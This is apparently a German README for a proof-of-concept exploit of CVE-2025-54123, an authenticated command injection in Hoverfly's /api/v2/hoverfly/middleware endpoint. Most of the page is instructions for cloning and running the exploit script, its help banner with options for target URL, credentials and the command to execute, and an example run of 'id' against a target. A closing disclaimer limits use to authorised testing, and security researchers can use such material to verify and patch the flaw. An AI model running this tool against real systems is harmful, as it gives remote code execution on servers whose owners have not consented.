
PoC CVE-2025-54123 - Hoverfly <= 1.11.3 - Authentifizierte Middleware-Befehlsinjektion
PoC CVE-2025-54123 - Middleware-Befehlsinjektion in Hoverfly
Diese Schwachstelle betrifft Hoverfly-Versionen ≤ 1.11.3 und zielt speziell auf den Endpunkt /api/v2/hoverfly/middleware ab. Sie wird durch unzureichende Eingabevalidierung und -bereinigung in mehreren Dateien, einschließlich middleware.go, local_middleware.go und hoverfly_service.go, verursacht. Vom Benutzer gesteuerte Eingaben, die an den Parameter script übergeben werden, werden ohne ordnungsgemäße Prüfungen direkt an eine System-Binärdatei (z. B. /bin/bash) weitergeleitet, was Remote-Befehlsausführung (RCE) mit den Berechtigungen des Hoverfly-Prozesses ermöglicht.
curlgit clone https://github.com/f4dee-backup/CVE-2025-54123
cd CVE-2025-54123
chmod +x CVE-2025-54123.sh
./CVE-2025-54123.sh -h
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ███████╗ ███████╗██╗ ██╗ ██╗██████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔════╝ ██╔════╝██║ ██║███║╚════██╗╚════██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗█████╗███████╗███████║╚██║ █████╔╝ █████╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝╚════██║╚════██║ ██║██╔═══╝ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗███████║ ███████║ ██║ ██║███████╗██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝ ╚══════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
Hoverfly <= 1.11.3 - Authenticated Middleware Command Injection
[?] Parameters description:
-t Target base URL (e.g., http://target:8888)
-u Valid username
-p Valid password
-c Command to execute (must be enclosed in double quotes)
-h Show this help panel
[i] Example:
./CVE-2025-54123.sh -t http://target.com:8888 -u admin -p password -c "id"
Dieser Exploit ist ausschließlich für Bildungs- und autorisierte Sicherheitstestzwecke bestimmt.
Verwenden Sie dies NICHT gegen Systeme ohne ausdrückliche Genehmigung. Unbefugter Zugriff kann illegal sein.
Der Autor übernimmt keinerlei Verantwortung für Missbrauch oder verursachte Schäden.